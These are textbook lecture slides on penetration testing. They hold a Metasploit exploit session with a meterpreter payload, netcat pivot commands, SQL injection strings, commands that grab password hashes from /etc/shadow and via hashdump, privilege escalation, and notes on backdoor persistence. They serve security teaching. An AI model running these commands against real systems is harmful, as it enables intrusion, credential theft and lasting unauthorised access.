Chapter 8: Penetration Testing

Lecture Materials for the John Wiley & Sons book:

Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions

April 25, 2020 DRAFT 1

Key Forms of Penetration Attacks

• Buffer overflows
• Command injection
• SQL injection


Network Penetration and Metasploit (Console Session)

• # cd /pentest/exploits/framework3
• # ./msfconsole
• msf > search MS06-040
• msf > use exploit/windows/smb/ms06_040_netapi
• msf exploit(ms06_040_netapi) > info
• msf exploit(ms06_040_netapi) > show payloads
• msf exploit(ms06_040_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
• msf exploit(ms06_040_netapi) > show options
• msf exploit(ms06_040_netapi) > set RHOST 10.10.100.100
• msf exploit(ms06_040_netapi) > show targets
• msf exploit(ms06_040_netapi) > set TARGET 5
• msf exploit(ms06_040_netapi) > show options
• msf exploit(ms06_040_netapi) > save
• msf exploit(ms06_040_netapi) > check
• msf exploit(ms06_040_netapi) > exploit
• msf exploit(ms06_040_netapi) > sessions -l
• msf exploit(ms06_040_netapi) > sessions -i 1
• meterpreter> ?


Netcat, Pivoting, and Raw Shells

• Setting up and connecting a listener:
  – Target: # nc -l -p 80
  – Tester: # nc 10.10.100.10 80
• Setting up a 3-machine pivot:
  – Target (.30): # nc -l -p 80
  – Relay setup: # mknod FIFO p
  – Relay (.10): # nc -l -p 200 < FIFO | nc 10.10.100.30 80 > FIFO
  – Tester: # nc –10 10.10.100.10 80

Attacking Web/Internet Applications and Databases

• SQL injection attacks:
  – false') OR ('true' = 'true : grouping by parentheses
  – false' OR 'true' = 'true'; -- : -- is an SQL comment, ends statement
  – ' OR 'true' = 'true' --
  – 0 ; select * from Student where 0=0 ; --
  – 0' UNION SELECT * FROM Student where 0=0 --
• Paros Proxy is a Backtrack tool for man in the middle attacks
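The tautology and UNION strings on this slide only work because the application splices user input into the SQL text. As an added illustration (not from the book or its lecture materials), the Python below runs the slide's own payloads against a string-concatenated query and against a parameterized one over a constructed in-memory SQLite Student table; the three-column schema is an assumption standing in for the one the slide leaves unspecified.

```python
import sqlite3

# Constructed sample data: a tiny stand-in for the slide's "Student" table.
STUDENTS = [(1, "alice", "A"), (2, "bob", "B"), (3, "carol", "C")]


def make_db():
    """Build an in-memory SQLite database holding the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Student (id INTEGER, name TEXT, grade TEXT)")
    conn.executemany("INSERT INTO Student VALUES (?, ?, ?)", STUDENTS)
    return conn


def lookup_concat(conn, name):
    """Vulnerable form: the caller's value is spliced into the SQL text,
    so quotes, OR clauses, UNIONs and -- comments inside it become SQL."""
    sql = "SELECT id, name, grade FROM Student WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def lookup_param(conn, name):
    """Hardened form: the value is bound as a parameter; the database
    only ever compares it as a string, whatever characters it holds."""
    sql = "SELECT id, name, grade FROM Student WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


def compare(conn, value):
    """Return the row counts each form yields for the same input value."""
    return len(lookup_concat(conn, value)), len(lookup_param(conn, value))


if __name__ == "__main__":
    db = make_db()
    # The slide's payloads, reproduced as the values a client would submit.
    for value in ["bob",
                  "false' OR 'true' = 'true'; --",
                  "0' UNION SELECT * FROM Student where 0=0 --"]:
        concat_rows, param_rows = compare(db, value)
        print(f"{value!r:48} concat={concat_rows} param={param_rows}")
```

The concatenated query returns every row for both payloads, while the parameterized query returns none, because no student is literally named with that string.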

User Enumeration and Hash Grabbing

• Gather web email addresses on Backtrack
  – # cd /pentest/enumeration/google/theHarvester
  – # ./theHarvester.py -d cnn.com -b pgp
• Hash grabbing with meterpreter
  – meterpreter> use privs
  – meterpreter> hashdump
• Enumeration on Linux
  – # cut -d: -f1 /etc/passwd
• Hash grabbing from root on Linux
  – # grep -v ':x:' /etc/shadow | grep -v ':!:' | cut -d: -f2

Password Cracking

• Password policies on Windows
  – Local Windows password policies:
    • C:\> net accounts
  – Windows domain password policies:
    • C:\> net accounts /domain
• John the Ripper supports password cracking
  – based on brute force, dictionary, fuzzing
• Rainbow table techniques are highly efficient algorithms for cracking complex passwords using tables with exhaustive password/hash lists
• Cain & Abel cracks passwords from all Windows formats, popular network devices, and databases using multiple techniques, such as brute force, dictionary, and rainbow tables

Privilege Escalation

• Privilege escalation means gaining administrative privileges, e.g. root
• Some Metasploit exploits automatically escalate, e.g.
  – modules/exploit/unix/smtp/exim4_string_format, used with the shell_reverse_tcp payload
• Meterpreter can also escalate, for example:
  – meterpreter > use privs: Load the Privs module
  – meterpreter > getsystem -h: Help text
  – meterpreter > getsystem: Privilege escalation
  – meterpreter > hashdump: Grab password hashes

Final Malicious Attack Phases

• Forward and Reverse Backdoors
  – Easy to set up using netcat listeners
• Entrenchment
  – To survive reboot, add the backdoor to /etc/rc.local or /etc/rc.d/rc.local (both Linux) or to the Startup Folder (Windows)
• Hidden Files
  – Easily accomplished on Windows (checkbox) or Linux (. or .. filename)
• Rootkits
  – Rootkits are an ultimate form of malicious entrenchment.

REVIEW CHAPTER SUMMARY